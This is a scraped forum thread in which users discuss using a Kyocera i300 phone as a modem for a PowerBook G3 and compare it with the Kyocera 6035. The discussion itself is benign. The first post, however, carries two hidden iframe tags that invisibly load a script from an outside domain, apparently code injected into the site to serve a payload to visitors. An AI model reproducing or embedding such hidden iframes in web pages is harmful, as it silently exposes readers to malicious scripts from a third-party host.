+ Reply to Thread
    Wannabe Techie

Question i300 for a Modem?!?!

How do I use the i300 as a modem for my Powerbook G3? I've heard talk about people doing it with cellphones but I never really paid it any attention till now. Its just my curiousity...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    "...my palms are too hairy to hide."
    -Eminem

Re: i300 for a Modem?!?!

Originally posted by Hairy Palms

How do I use the i300 as a modem for my Powerbook G3? I've heard talk about people doing it with cellphones but I never really paid it any attention till now. Its just my curiousity...
    I am not sure about this, but I think you can just stick it in the charger, hook the charger up to your PC, and dial. If the Mac doesn't have a serial port, then get a USB to serial converter cable.

Administrator

Arrow

be sure and set up the port on the computer so it knows where to look for the modem and do basically wahtr the previous poster stated... very easy.

Hey "nix", do you have to disable hotsync manager like the '35?

Administrator

Arrow

yes!

"nixx", feature for feature, a lot of similarities? In other words, yes, the I300 is colour, but other than that, is the '35 still a pretty good choice in your opinion? If say the I300 was recalled for a couple of weeks, and you had to make do with the Kyo for that time, would you feal terrible? Or would you say, oh, I can easily get by, no big deal?

Administrator

Arrow

the 6035 is more robust and the dedicated dialpad is a big plus. the i300 only brings oclor to the table... if not for that, i would not have gotten the 300. the 6035 is a great phone and very hard to beat. if i had to be without the 300 for a while, the 6035 would fit in very nicely... no worries on that.

not sure if i answered your question very good, but heck no i would not mind using the '35 again... the size and heft of it never bothered me..

As always, you answered "poifectly". 'Nixx, you da best.

Administrator

Arrow

geesh.. i just realized how many typos i had in that post.. im glad you could read thru them... :p